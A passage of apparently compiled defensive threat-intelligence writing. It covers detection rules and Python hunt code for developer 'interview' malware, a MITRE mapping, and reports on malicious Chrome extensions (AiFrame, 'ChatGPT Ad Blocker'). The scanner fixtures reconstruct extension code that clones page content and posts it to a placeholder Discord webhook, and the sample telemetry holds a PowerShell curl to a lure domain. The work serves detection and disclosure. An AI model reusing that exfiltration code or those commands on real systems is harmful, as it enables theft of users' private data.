- Followed by outbound connection within 60 seconds
- Parent chain includes Code.exe or node.exe
Flag as:
Credential Harvesting via Developer Workflow
9. CI/CD Pivot Detection
Sigma (optional enterprise detection)
title: Unusual GitHub Token Usage from Developer Endpoint
id: cti-github-token-abuse
status: experimental
logsource:
  category: network_connection
detection:
  selection:
    DestinationHostname|contains:
      - 'api.github.com'
  # Sigma has no not_contains modifier: exclude the normal git client by
  # negating a filter selection in the condition instead.
  filter_git_client:
    UserAgent|contains:
      - 'git'
  condition: selection and not filter_git_client
level: medium
10. High-Fidelity Hunt Query (EDR / SIEM)
Use this as a compound hunt:
(
ParentProcess = Code.exe
AND ChildProcess IN (cmd, powershell, bash)
)
OR
(
Process = node
AND CommandLine CONTAINS (.woff OR .svg OR .jpeg)
)
OR
(
Process = Code.exe
AND NetworkDomain IN (vercel.app, jsonkeeper.com, npoint.io)
)
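The execution-chain rule and the compound hunt query above, as an added worked example in Python; this is not code from the original detection pack. It runs three rules over constructed process-creation and network-connection events from a hypothetical developer workstation (host names, pids, paths and the lure domain lure-task.vercel.app are made up); the staging-service names and the .woff/.svg/.jpeg invariant are the ones the pack lists.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Image names are compared case-insensitively after stripping the directory.
IDE_IMAGES = {"code.exe", "code"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "bash", "sh"}
NODE_IMAGES = {"node.exe", "node"}
DOWNLOAD_MARKERS = re.compile(r"\b(curl|wget|http)\b", re.IGNORECASE)
NONCODE_EXTENSIONS = re.compile(r"\.(woff|svg|jpeg)\b", re.IGNORECASE)
# Staging services named in the pack, matched as substrings of the destination host.
STAGING_MARKERS = ("vercel.app", "jsonkeeper", "npoint", "pastebin")


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    pid: int
    image: str
    parent_image: str
    cmdline: str


@dataclass
class NetEvent:
    ts: datetime
    host: str
    pid: int
    dest_host: str


def basename(path: str) -> str:
    """Image name without its directory, lower-cased, so Windows and POSIX paths compare alike."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_staging_host(dest_host: str) -> bool:
    dest_host = dest_host.lower()
    return any(marker in dest_host for marker in STAGING_MARKERS)


def ide_shell_download_chain(procs, nets, window=timedelta(minutes=2)):
    """Rule 1 (CRITICAL): IDE -> shell with a download marker -> staging connection
    from the same host within `window`. Correlation is by host, not pid, because the
    connection is usually made by a grandchild (curl/wget) rather than the shell."""
    alerts = []
    for p in procs:
        if basename(p.parent_image) not in IDE_IMAGES or basename(p.image) not in SHELL_IMAGES:
            continue
        if not DOWNLOAD_MARKERS.search(p.cmdline):
            continue
        hits = [n for n in nets
                if n.host == p.host and p.ts <= n.ts <= p.ts + window and is_staging_host(n.dest_host)]
        if hits:
            alerts.append({"rule": "ide_shell_download_chain", "severity": "CRITICAL",
                           "host": p.host, "pid": p.pid, "dest": hits[0].dest_host})
    return alerts


def node_noncode_execution(procs):
    """Rule 2 (HIGH): Node asked to execute a file with a font/image extension."""
    return [{"rule": "node_noncode_execution", "severity": "HIGH",
             "host": p.host, "pid": p.pid, "cmdline": p.cmdline}
            for p in procs
            if basename(p.image) in NODE_IMAGES and NONCODE_EXTENSIONS.search(p.cmdline)]


def ide_staging_connection(procs, nets):
    """Rule 3 (MEDIUM): the IDE process itself talking to a staging service.
    The process table resolves the connecting pid to an image name."""
    image_by_pid = {(p.host, p.pid): basename(p.image) for p in procs}
    return [{"rule": "ide_staging_connection", "severity": "MEDIUM",
             "host": n.host, "pid": n.pid, "dest": n.dest_host}
            for n in nets
            if image_by_pid.get((n.host, n.pid)) in IDE_IMAGES and is_staging_host(n.dest_host)]


def hunt(procs, nets):
    """Compound hunt: the union of the three rules, highest severity first."""
    rank = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2}
    alerts = (ide_shell_download_chain(procs, nets) + node_noncode_execution(procs)
              + ide_staging_connection(procs, nets))
    return sorted(alerts, key=lambda a: rank[a["severity"]])


# Constructed sample telemetry (not from the report); hosts, pids, paths and the lure domain are made up.
VSCODE = r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe"
PWSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
T0 = datetime(2026, 3, 2, 9, 0, 0)
SAMPLE_PROCS = [
    ProcEvent(T0 - timedelta(hours=1), "dev-01", 4300, VSCODE, r"C:\Windows\explorer.exe", "Code.exe"),
    ProcEvent(T0, "dev-01", 4100, PWSH, VSCODE,
              "powershell -c curl http://lure-task.vercel.app/task.json -o task.json"),
    ProcEvent(T0 + timedelta(seconds=30), "dev-01", 4120, r"C:\Program Files\nodejs\node.exe", VSCODE,
              "node ./assets/fonts/icons.woff"),
    ProcEvent(T0, "dev-02", 5100, PWSH, VSCODE, "powershell -c npm run build"),  # benign IDE-spawned shell
]
SAMPLE_NETS = [
    NetEvent(T0 + timedelta(seconds=5), "dev-01", 4150, "lure-task.vercel.app"),  # curl child of pid 4100
    NetEvent(T0 + timedelta(seconds=40), "dev-01", 4300, "api.jsonkeeper.com"),   # the IDE process itself
    NetEvent(T0 + timedelta(minutes=10), "dev-02", 5100, "registry.npmjs.org"),   # benign
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_PROCS, SAMPLE_NETS):
        print(alert)
```

The chain rule is the one to tune first: the two-minute window and the host-level (rather than pid-level) correlation trade a little noise on hosts where developers legitimately fetch from Vercel-hosted projects for not missing the grandchild process that actually makes the connection.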
Detection Philosophy (Important)
This pack deliberately avoids over-reliance on static IOCs because:
Payloads are ephemeral
Infrastructure rotates
Code is frequently modified
Instead, it focuses on execution invariants:
IDE-driven execution (rare in benign workflows)
Shell invocation from developer tools
Non-standard file execution via Node
Immediate outbound network activity
Priority Signals (What to Alert On First)
If you need triage prioritization:
Highest confidence
Node executing .woff / .svg
VS Code → shell → network chain
Medium confidence
jsonwebauth / lserver.js presence
Vercel + developer workstation correlation
Lower (context required)
Function.constructor usage
GitHub API anomalies
Analytical Alignment
This detection model aligns with the same operational compression observed in Muddled Libra:
rapid execution post-access
minimal malware footprint
identity/token theft as primary objective
The Unit 42 dataset reinforces this shift toward speed and identity abuse over persistence, reducing the utility of traditional detection layers.
Appendix D: MITRE ATT&CK Mapping
ATT&CK Techniques Most Strongly Associated with the Campaign
T1566.003 – Phishing: Spearphishing via Service. Recruiter outreach and lure delivery through LinkedIn, code-hosting platforms, and other online services.
T1566.002 – Phishing: Spearphishing Link. Victims are directed to malicious repositories, staged assessments, or hosted payload locations.
T1204.001 / T1204.002 – User Execution. Victims voluntarily execute code as part of an “interview” or “technical test.”
T1059.007 – Command and Scripting Interpreter: JavaScript. Malicious npm / Node execution is central to multiple documented chains.
T1059.006 – Command and Scripting Interpreter: Python. PyLangGhost and related scripting components support cross-platform execution.
T1059.004 – Command and Scripting Interpreter: Unix Shell. Shell-based staging and download logic are documented in IDE task-abuse chains.
T1036 – Masquerading. Malicious content is disguised as normal interview code, repositories, tasks, or packages.
T1027 – Obfuscated Files or Information. Obfuscated JavaScript and disguised non-code assets are part of the execution chain.
T1555 / T1555.003 – Credentials from Password Stores / Web Browsers. Theft of browser credentials and related local secrets is a recurring objective.
T1005 – Data from Local System. Collection of local credentials, wallet information, and developer artifacts from endpoints.
T1071 – Application Layer Protocol. C2 and staging are conducted over ordinary web traffic and cloud services.
T1567 – Exfiltration Over Web Service. Use of cloud-hosted platforms and web services for staging and likely data movement.
Analysis of the persistent AIFrame campaign: A fake Google Authenticator Chrome extension and 6+ related apps use "deploy clean, update dirty" tactics to steal 2FA credentials and inject malicious iframes. Learn how this operation bypasses Google’s security reviews.
A Chrome extension impersonating Google's Authenticator application was identified as part of an ongoing malicious campaign active since at least early 2026. The extension appears to use Chrome's localization system and skeleton code to bypass security reviews. Despite its functional appearance, it requests broad, unnecessary permissions and contains “dormant infrastructure”. This suggests a staged deployment model, where the extension remains trustworthy on the surface while maintaining the architectural groundwork to deliver a malicious update without requiring further permission approvals from the user or the store.
This extension is linked to at least six others through a shared developer front, two of which already carry fully operational malicious payloads. These extensions utilize hidden iframes to inject attacker-controlled content into every webpage, deploy fraudulent paywalls for free services, and maintain bidirectional communication with C2 servers. The infrastructure maps directly to the AiFrame campaign, which reportedly compromised over 260,000 users from 2025 to present. This current operation marks a continued evolution of that threat, specifically implementing additional steps to bypass detection and the apparent targeting of security-conscious individuals who may inadvertently hand over their sensitive two-factor authentication (2FA) credentials to the attackers.
Details
2FA Authenticator - generate secure codes in your browser. Fast, offline two-factor authentication for all your accounts. Over 30,000 downloads. Published on 2026-04-02.
Lure site: authenticator[.]sh
The site links to
https[:]//chromewebstore.google[.]com/detail/2FA/ebhcbenbgjmaebpgbldimndmfomjmphd?utm_source=site (A fake Authenticator)
https[:]//github[.]com/google/google-authenticator (the real Google Authenticator)
The Extension
The authenticator app has severely over-privileged manifest permissions. Namely, a TOTP generator has zero need to access web page content.
"host_permissions": [
  "<all_urls>"
],
The permissions may enable the actor to read/modify content on every website, inject content scripts into any page, intercept form data, cookies and session tokens, or overlay phishing pages via iframes. The <all_urls> host permission is not used anywhere in the initially downloaded codebase: no content scripts are declared or programmatically registered. Its presence is likely a pre-staged capability for a future malicious update, a common strategy for bypassing Chrome Web Store security checks, sometimes described as a “deploy clean, update dirty” strategy.
Within the code for the downloaded extension there is a file “background/service-worker.js” that handles installation and uninstallation. Its code is minified; the following is a de-minified view of its contents.
Here we see a Google Form is used to track app uninstallations.
References to the whitelab[.]studio domain are also seen: https[:]//authenticator.whitelab[.]studio/${lang}/welcome
The installation behavior
Opens https://authenticator.whitelab[.]studio/{locale}/welcome in a new tab immediately on install
Detects the user's language and selects from 20 supported locales
Phones home to the extension owner’s infrastructure, confirming installation and storing the user's locale preference
There is a dormant message listener “chrome.runtime.onMessage.addListener((s, t, e) => !0);” that would accept all messages from any context (popup, content scripts, other extensions). This is likely a skeleton hook. The service worker could act as a relay between injected content scripts and a C2 server. This empty listener would then be the scaffolding for that relay. A future update to the service worker or the addition of a content script would activate it without requiring a manifest change. Combined with the pre-staged <all_urls> permission, this is a fully prepared malware delivery mechanism awaiting activation.
The Submitter
The app was submitted by email domain airnetic[.]space, its welcome page is sourced from authenticator.whitelab[.]studio.
authenticator.whitelab[.]studio
The site has links to multiple other Chrome Web Store extensions, listed by category, name, description and URL, for example:
Category: Productivity
Name: AI Chat to PDF
Description: Export your AI chat conversations to beautifully formatted PDF files. One click, clean output.
Of those extensions linked from the whitelab domain, AI Agent (originally "Google Gemini"), fdlagfnfaheppaigholhoojabfaapnhb, was reported by LayerX Security in February 2026. It was described as a “coordinated campaign of Chrome extensions posing as AI assistants for summarization, chat, writing, and Gmail assistance” active since 2025 that used injected iframes and intended to steal business data, browsing history and credentials. A different activity report by Koi Research describes a similar campaign dubbed the AI Frame campaign occurring more recently that notably also used GitHub payloads, though no direct indicator links were observed.
Airnetic[.]space was also used as an alias Gmail address, airnetic.space[@]gmail[.]com, for multiple AI Frame campaign extensions. A domain of the same name was registered on 2025-03-02, but it is unknown if the domain is related to this extension or actor.
Extension Name – Extension ID
2FA (Featured on Chrome Web Store) – ebhcbenbgjmaebpgbldimndmfomjmphd
AI Sidebar Chrome (Using Deepseek Logo) – djhjckkfgancelbmgcamjimgphaphjdl
ChatGPT Sidebar – llojfncgbabajmdglnkbhmiebiinohek
The infrastructure and domains used by the actor continue to be used despite the extensive public reporting by multiple security companies. Domains still resolve to the lure sites, including those hosted on Vercel and Amazon. Extensions in the Google Web Store also continue to be available with a few identified exceptions.
Whitelab’s AI Chat to PDF Extension
Looking at other extensions from the whitelab[.]studio domain:
Name: AI Chat to PDF
Publisher: ai-chat-to-pdf[.]com
Publisher Email: airtronics307[@]gmail[.]com
Google Web Store ID: nlfkaldinolmacagmiddfpnfaeclfibn
Description: Instantly export your Gemini chats to PDF: smart conversion for perfect results.
C2: appbox[.]space
The extension itself is even more overprivileged and malicious than the authenticator variant.
Read all tab URLs, reload arbitrary tabs
Local + sync storage access
Full Chrome DevTools Protocol — attach to any tab, intercept network, execute arbitrary JS, capture page content
Trigger file downloads
Access to every webpage
241KB JS injected into every page
External websites can directly control the extension
Install: Phone Home + Force Inject Gemini
Event Telemetry — POST to C2
Storage Proxy — Remote Read/Write/Delete
The external website appbox.space has full remote read/write/delete access to the extension's Chrome storage. This is a remote-control storage proxy. The attacker can manipulate any persisted data without the user's knowledge.
An invisible iframe (0×0 pixels, zero opacity) is injected into every page, loading remote content from the attacker's C2 server (appbox.space/paywall/502). The user ID is passed as a URL parameter for tracking. This matches the exact technique documented by LayerX in February 2026 — but using new infrastructure (appbox.space instead of tapnetic[.]pro).
Bidirectional postMessage Communication:
Paywall Object — Remote Control Interface
Overall, the "AI Chat to PDF" extension presents itself as a utility for exporting Google Gemini conversations to PDF format, and it does technically provide that functionality using Chrome's Debugger API to attach to tabs and invoke Page.printToPDF. However, beneath this legitimate surface, the extension operates as active malware. A 241KB content script is injected into every webpage the user visits, and on Gemini-related pages, it deploys a hidden, zero-pixel iframe loading remote content from the attacker's C2 server at appbox.space/paywall/502. This invisible iframe enables bidirectional communication via postMessage, allowing the attacker to push paywall modals that attempt to charge users for access to Google's free Gemini service. Simultaneously, a MutationObserver continuously monitors the page DOM, systematically cataloging all AI conversation messages with tracking attributes for potential extraction.
Beyond the iframe injection, the extension establishes a full remote-control channel via its background service worker. This service maintains persistent connections from appbox[.]space, POSTs user event telemetry (including a persistent UUID and hardcoded campaign identifier "wallId: 502") to the C2's tracking API, and, most critically, acts as a storage proxy. This allows the external website to remotely read, write, and delete arbitrary keys in the user's Chrome storage via a Supabase authentication protocol. The manifest also reveals externally_connectable access for the C2 and a development server left in the production build. Published under the whitelab.studio umbrella (the same group behind the fake Google Authenticator), this confirms a "mixed-stage" portfolio where the actor maintains some clean apps to build a user base while others carry fully operational AiFrame-style payloads.
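To show how the over-privilege described above (the <all_urls> host permission with no content script behind it in the authenticator, and the debugger, downloads and externally_connectable entries in AI Chat to PDF) can be checked mechanically, here is an added Python example; it is not code from the report or from either extension. The manifests it audits are constructed from the report's descriptions, not the real manifest files; the appbox.space origin is the C2 named in the report, and Manifest V3 key names are assumed.

```python
import json

# Host patterns that grant access to every site, or every site on a scheme.
BROAD_HOST_PREFIXES = ("*://*/", "http://*/", "https://*/")


def is_broad(pattern: str) -> bool:
    return pattern == "<all_urls>" or pattern.startswith(BROAD_HOST_PREFIXES)


def audit_manifest(raw_manifest: str) -> list:
    """Flag manifest features that exceed what a single-purpose extension needs.
    Returns {"code", "detail"} findings; Manifest V3 key names are assumed."""
    m = json.loads(raw_manifest)
    perms = set(m.get("permissions", []))
    host_perms = set(m.get("host_permissions", []))
    content_scripts = m.get("content_scripts", [])
    broad_hosts = sorted(h for h in host_perms if is_broad(h))
    # Things that can actually put code into pages: declared content scripts or the scripting API.
    can_inject = bool(content_scripts) or "scripting" in perms
    findings = []
    if broad_hosts and not can_inject:
        findings.append({"code": "DORMANT_BROAD_HOST_ACCESS",
                         "detail": f"{broad_hosts} granted but nothing in the manifest uses it; "
                                   "a later update could add a content script without a new permission prompt"})
    elif broad_hosts:
        findings.append({"code": "BROAD_HOST_ACCESS", "detail": f"{broad_hosts} in host_permissions"})
    all_page_scripts = sorted({js for cs in content_scripts
                               if any(is_broad(p) for p in cs.get("matches", []))
                               for js in cs.get("js", [])})
    if all_page_scripts:
        findings.append({"code": "CONTENT_SCRIPT_ALL_PAGES",
                         "detail": "runs on every page: " + ", ".join(all_page_scripts)})
    if "debugger" in perms:
        findings.append({"code": "DEBUGGER_API",
                         "detail": "chrome.debugger can attach to any tab, intercept network traffic and run script"})
    externally = m.get("externally_connectable", {})
    if externally.get("matches"):
        findings.append({"code": "EXTERNALLY_CONNECTABLE",
                         "detail": "web pages matching " + ", ".join(externally["matches"])
                                   + " can message the extension directly"})
    if "downloads" in perms:
        findings.append({"code": "DOWNLOADS_API", "detail": "the extension can start file downloads"})
    return findings


def finding_codes(raw_manifest: str) -> list:
    return [f["code"] for f in audit_manifest(raw_manifest)]


def excess_permissions(raw_manifest: str, required: set) -> set:
    """Permissions and host patterns granted beyond what the stated purpose needs."""
    m = json.loads(raw_manifest)
    return (set(m.get("permissions", [])) | set(m.get("host_permissions", []))) - required


# Constructed manifests modelled on the report's descriptions; not the extensions' real files.
AUTHENTICATOR_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "2FA",
    "permissions": ["storage"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "background/service-worker.js"},
})
CHAT_TO_PDF_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "AI Chat to PDF",
    "permissions": ["tabs", "storage", "debugger", "downloads"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
    "externally_connectable": {"matches": ["https://appbox.space/*"]},  # C2 origin named in the report
})
BENIGN_TOTP_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Plain TOTP",
    "permissions": ["storage"],
    "action": {"default_popup": "popup.html"},
})

if __name__ == "__main__":
    for name, raw in [("2FA", AUTHENTICATOR_MANIFEST), ("AI Chat to PDF", CHAT_TO_PDF_MANIFEST),
                      ("Plain TOTP", BENIGN_TOTP_MANIFEST)]:
        print(name, finding_codes(raw), excess_permissions(raw, {"storage"}))
```

The two checks answer different questions: excess_permissions compares the grant against the stated purpose (a TOTP generator needs at most storage), while DORMANT_BROAD_HOST_ACCESS is the specific "deploy clean, update dirty" signature, a broad host grant that nothing in the current build consumes.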
Whitelab’s Convert Heic to jpg Extension
Looking at other extensions from the whitelab[.]studio domain:
Name: convert-heic-to-jpg
Publisher: heic-to-jpg[.]pro
Publisher Email:
tapnetic307[@]gmail[.]com
convertheic2jpg[@]gmail[.]com
Google Web Store ID: nmijijenojhiaohkfedfgchgbmjnfcpp
Description: Convert HEIC to JPG swiftly & privately. Process unlimited files without server uploads. Secure and rapid conversion.
C2: onlineapp[.]pro
Yandex Tracker: 96330078 on heic-to-jpg[.]pro lure domain
The extension has a hidden iframe
Uses onlineapp[.]pro — the original AiFrame C2s from the February 2026 LayerX report, still active.
Shadow DOM evasion — the iframe is hidden inside a Shadow DOM element (.shadowRoot), making it invisible to standard DOM inspection and most browser extension security scanners.
C2 command execution — the "redirect" command lets the C2 server open any arbitrary URL in the user's browser.
Triple-Redundant C2 Origin Validation
Domain pivots
Overlaps from whitelab[.]studio:
Website Title: Tapnetic | Tap into the future, powered by innovation.
Server Type: nginx or vercel
IP ISP: Vercel Inc
Name Server Domain: porkbun[.]com
Registrar: Porkbun
Email Domain: cloudflare[.]com
whitelab[.]studio
sidenox[.]stream
sidentica[.]app
softnetica[.]com
A look at sidenox[.]stream site:
Sidenox is similar to the whitelab[.]studio site in many ways including the use of Russian language comments and mentioning apps developed but it does not provide direct links or references to those apps like whitelab did.
The apps Sidenox claims to have developed are broader, including healthcare and mobile apps, going beyond the AI and file conversion apps we’ve identified directly in this cluster so far.
AI Chat Platform: A multi-model chat application (supporting GPT, Claude, Gemini).
E-Commerce Platform: A marketplace with real-time inventory and Stripe integration.
Healthcare Dashboard: A HIPAA-compliant analytics dashboard.
Mobile Apps: The text mentions they build native and cross-platform apps for iOS and Android using React Native and Swift.
A look at the old C2: Tapnetic | Tap into the future, powered by innovation – tapnetic[.]pro
On claude.tapnetic[.]pro, a Facebook tracking pixel is used: “762928773371443”
Subdomains of tapnetic[.]pro
api.tapnetic[.]pro
www.tapnetic[.]pro
xai.tapnetic[.]pro
bard.tapnetic[.]pro
grok.tapnetic[.]pro
llama.tapnetic[.]pro
claude.tapnetic[.]pro
gemini.tapnetic[.]pro
gemini.google.tapnetic[.]pro
chat-ai.tapnetic[.]pro
chatgbt.tapnetic[.]pro
chatgpt.tapnetic[.]pro
chat-gbt.tapnetic[.]pro
deepseek.tapnetic[.]pro
ask-gemini.tapnetic[.]pro
chat-bot-gpt.tapnetic[.]pro
grok-chatbot.tapnetic[.]pro
authenticator.tapnetic[.]pro
asking-chat-gpt.tapnetic[.]pro
deepseek-to-pdf.tapnetic[.]pro
chat-with-gemini.tapnetic[.]pro
The Authenticator subdomain was first seen 2026-02-06 while the rest were active at least before 2025-08. The timing appears to line up with the public reporting of this C2 and the actor’s apparent pivot to the newer infrastructure detailed in this report.
Overlaps from appbox[.]space
Appbox[.]space was seen in multiple extensions with an iframe used for C2 such as in the following sample code:
Website Title: AppBox — Platform for Processing Tokenized Requests
It is concerning to see so many of the previously reported malicious extensions still being hosted by Google’s Web Store and multiple registrars. Google in particular should be expected to have the capacity to apply AI to vetting these extensions, and current AI capabilities would be more than adequate to identify them.
Considering the scale of these extensions in at least many dozens, the persistent behavior of the actor behind them going back as early as 2024, and the potentially hundreds of thousands of impacted users, this highlights the need for more expeditious identification and disruption actions against malicious applications and infrastructure.
Across the extensions examined, a consistent operational pattern is evident: utility software is published with legitimate functionality to attract a user base, while the underlying permissions and architecture are designed to support capabilities far beyond what the stated purpose requires. In two of three cases shown in this report, those capabilities are already active; the third—the authenticator—appears to be a "sleeper" awaiting remote activation. This developer portfolio blends clean and compromised extensions within the same storefront, a technique specifically designed to obfuscate risk and bypass the automated review systems of the Chrome Web Store.
The attribution to the AiFrame campaign rests on multiple independent indicators, including developer contact info, C2 domains, and specific paywall code patterns that converge on the same operation documented months earlier. Notably, the original command-and-control domains remain active and are still being utilized by extensions under the new branding, indicating that previous public disclosures failed to disrupt the infrastructure. With the introduction of unreported fallback domains and a new generation of C2 architecture, the actor is clearly investing in long-term resilience. At least five additional extensions in this portfolio remain unexamined and should be treated as potentially compromised.
From Gramsci's 'morbid symptoms' to modern threat intelligence - a cybersecurity roundup exploring why defenders should treat root causes over chasing dramatic threats, with curated links on ransomware, HUMINT, disinformation, and more.
“The old world is dying, and the new world struggles to be born; now is the time of monsters” - so spoke Italian political theorist Antonio Gramsci nearly one hundred years ago. Or, to be more accurate, around 1930 Gramsci wrote:
La crisi consiste appunto nel fatto che il vecchio muore e il nuovo non può nascere: in questo interregno si verificano i fenomeni morbosi piú svariati.
which has been translated directly as:
The crisis consists precisely in the fact that the old is dying and the new cannot be born; in this interregnum a great variety of morbid symptoms appear.
The vigilance of defenders and investigators often focuses on monsters, typically ones easy to classify and thus easy to articulate wins to management.
What would our industry look like if instead, we triaged the morbid symptoms of our environments, of our systems? Fighting dragons feels more satisfying than covering fundamentals. How do we frame the problem, get exec on-side, but more importantly, how do we continue to motivate ourselves in a world so seemingly full of morbid symptoms, most outside our control?
Answers usually don’t survive first contact with reality. For my part, I fall back on a mindfulness of effort. As I plan and execute, my work of 2026 includes asking myself over and over, “Am I chasing monsters, or is there an underlying morbid symptom here that means monsters spawn less, or elsewhere?”
Kentik - Internet and Airstrikes: Tracking Iran's Extended Communication Blackout - This is a deeply interesting post to me. Unsurprisingly, we’ve got a good vantage point for internet visibility, and are still working with data from 2/28 onward to better understand what’s taking place. There’s substantial value in being able to visualize negative space, though this is often forgotten amidst the rush to categorize the seen instead.
Image above from Kentik post identifying distinct shutdown phases.
We’ve been busy little gremlins, recently, and our ability at DomainTools Investigations to remain timely and relevant despite being a scrappy little team continues to make me deeply proud. From us over the past month or so:
DTI - DPRK Malware Modularity: Diversity and Functional Specialization - Our industry does well at analyzing individual malware strains. What if we looked at a more holistic picture, though? What if we looked at all the current tracks together, what would it tell us?
DTI - CloudFlare Anti-Security For Phishing - Shorter piece on some veeeery interesting anti-analysis technicals amidst a larger phishing campaign.
DTI - OpenAI Anti-Ads Malware - That browser plugin offering to block ads served by OpenAI’s free tier might not be as convenient as you think it is…
Stay protected against the "ChatGPT Ad Blocker" malware. This investigation reveals how a malicious Chrome extension uses Discord webhooks to steal private ChatGPT conversations, prompts, and metadata.
This report details the discovery of a malicious Chrome extension, named "ChatGPT Ad Blocker", found on the Google Chrome Web Store. The extension, linked to the GitHub ID krittinkalra (also linked to AI4ChatCo and Writecream), masquerades as an ad-blocking tool but is primarily designed to steal the user’s ChatGPT conversation data by systematically copying the HTML page and sending it to a webhook on a private Discord channel.
The identified activity appears to be an attempt to capitalize on OpenAI's policy shift to serve advertisements on its free tier by distributing malicious extensions that allege to block these ads.
While the three domains identified with the website above were not fully functional at the time of discovery, in that they did not have a working pointer to the extension file, two newly created extensions by the same name and theme were found on Google’s Chrome Web store for extensions.
Extension Name: ChatGPT Ad Blocker
Extension ID: ipmmidjikiklckbngllogmggoofbhjikgb
Created: February 10, 2026
Developer: krittinkalra (GitHub ID: 6893033)
Email Domain: ai4chat[.]co
Malicious Extension
Upon installing the extension chrome.runtime.onInstalled fires immediately.
This calls updateRules() to fetch remote configuration that creates a persistent alarm: chrome.alarms.create("fetchRules", {periodInMinutes: 60}) and fetches from: `https[:]//raw.githubusercontent[.]com/krittinkalra/chatgpt-ad-blocker/main/rules.json`
The alarm triggers every 60 minutes: chrome.alarms.onAlarm.addListener() re-fetches rules.json with cache-busting: RULES_URL?t=${Date.now()}. This ensures the browser never caches the configuration and would enable the attacker to remotely change the behavior of the extension without the user's knowledge.
When the user browses to ChatGPT, the content.js script is injected, loading stored rules from chrome.storage.local. The current configuration was found to have the Ad-blocking function disabled. Instead, it registers a message listener for exfiltration trigger: chrome.runtime.onMessage.addListener()
The primary purpose of the extension appears to be data harvesting.
It appears to do this via the popup.js → content.js scripts: popup.js sends a message to content.js, chrome.tabs.sendMessage(tab.id, {action: "GET_SANITIZED_HTML"}), and content.js then calls getSanitizedHTML(). This function clones the entire DOM with document.body.cloneNode(true), removes rendering elements (scripts, styles, images) but preserves the text and structure of the page. It then walks the text nodes, redacts only text longer than 150 characters, if (node.nodeValue.length > 150), and returns the full HTML structure with the short text intact to popup.js.
With the prompt content from the page, popup.js then passes the captured user data to its sendReport() function, which creates a Discord embed payload with content: "**New Ad Report Received**", converts the captured HTML to a Blob with new Blob([htmlData], {type: 'text/html'}), builds FormData with a file attachment via formData.append('file', blob, 'page_dump.html'), and posts it to a hardcoded Discord webhook.
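The popup.js → content.js harvesting path and the hourly rules.json polling described above, as an added triage example in Python that is not part of the report. It scans a bundle of constructed source files modelled on that description (the GitHub path, webhook id and token are placeholders, not the real values) for the remote-configuration, DOM-cloning and webhook-upload patterns, extracts any webhook URLs for blocking, and combines the hits into a verdict.

```python
import re

# Each pattern corresponds to one behaviour the report describes, as a (code, regex) pair.
PATTERNS = [
    ("REMOTE_CONFIG_POLL", re.compile(r"chrome\.alarms\.create\(")),
    ("REMOTE_CONFIG_FETCH", re.compile(r"raw\.githubusercontent\.com/[^\s\"'`]+\.json")),
    ("CACHE_BUSTING", re.compile(r"\?t=\$\{Date\.now\(\)\}")),
    ("DOM_CLONE", re.compile(r"document\.body\.cloneNode\(\s*true\s*\)")),
    ("PAGE_DUMP_FILE", re.compile(r"new Blob\(\[[^\]]*\],\s*\{\s*type:\s*[\"']text/html[\"']")),
    ("FORMDATA_FILE", re.compile(r"\.append\(\s*[\"']file[\"']")),
    ("WEBHOOK_EXFIL", re.compile(r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+")),
]


def scan_file(source: str) -> list:
    """Codes of every pattern that appears in one source file, in PATTERNS order."""
    return [code for code, pattern in PATTERNS if pattern.search(source)]


def scan_extension(files: dict) -> dict:
    """Map file name -> matched codes, omitting files with nothing of interest."""
    report = {}
    for name, source in files.items():
        codes = scan_file(source)
        if codes:
            report[name] = codes
    return report


def webhook_urls(files: dict) -> list:
    """Exact webhook URLs found anywhere in the bundle, for blocking and takedown requests."""
    pattern = dict(PATTERNS)["WEBHOOK_EXFIL"]
    return sorted({m.group(0) for source in files.values() for m in pattern.finditer(source)})


def verdict(report: dict) -> str:
    """Combine per-file codes into one call. Harvest plus exfil is the decisive pair;
    remote configuration alone is suspicious because behaviour can change after review."""
    codes = set().union(*report.values())
    harvests = "DOM_CLONE" in codes
    exfiltrates = "WEBHOOK_EXFIL" in codes or {"PAGE_DUMP_FILE", "FORMDATA_FILE"} <= codes
    remote_config = {"REMOTE_CONFIG_POLL", "REMOTE_CONFIG_FETCH"} <= codes
    if harvests and exfiltrates:
        return "malicious: page content is harvested and exfiltrated"
    if remote_config:
        return "suspicious: behaviour is controlled by remotely fetched configuration"
    if codes:
        return "review: " + ", ".join(sorted(codes))
    return "clean"


# Constructed source files modelled on the report's description; the GitHub path and the
# webhook id/token are placeholders, not the real values.
SAMPLE_FILES = {
    "background.js": """
const RULES_URL = "https://raw.githubusercontent.com/EXAMPLE-OWNER/example-repo/main/rules.json";
async function updateRules() {
  const resp = await fetch(`${RULES_URL}?t=${Date.now()}`);
  chrome.storage.local.set({rules: await resp.json()});
}
chrome.runtime.onInstalled.addListener(() => {
  updateRules();
  chrome.alarms.create("fetchRules", {periodInMinutes: 60});
});
chrome.alarms.onAlarm.addListener(updateRules);
""",
    "content.js": """
function getSanitizedHTML() {
  const clone = document.body.cloneNode(true);
  clone.querySelectorAll("script, style, img").forEach(n => n.remove());
  return clone.outerHTML;
}
chrome.runtime.onMessage.addListener((msg, sender, reply) => {
  if (msg.action === "GET_SANITIZED_HTML") reply({html: getSanitizedHTML()});
});
""",
    "popup.js": """
const WEBHOOK = "https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_WEBHOOK_TOKEN";
async function sendReport(htmlData) {
  const blob = new Blob([htmlData], {type: 'text/html'});
  const formData = new FormData();
  formData.append('payload_json', JSON.stringify({content: "**New Ad Report Received**"}));
  formData.append('file', blob, 'page_dump.html');
  await fetch(WEBHOOK, {method: "POST", body: formData});
}
""",
}
# A genuinely local ad remover for comparison: no remote config, no DOM export, no upload.
BENIGN_FILES = {
    "content.js": """
chrome.storage.local.get("selectors", ({selectors = []}) => {
  selectors.forEach(sel => document.querySelectorAll(sel).forEach(el => el.remove()));
});
""",
}

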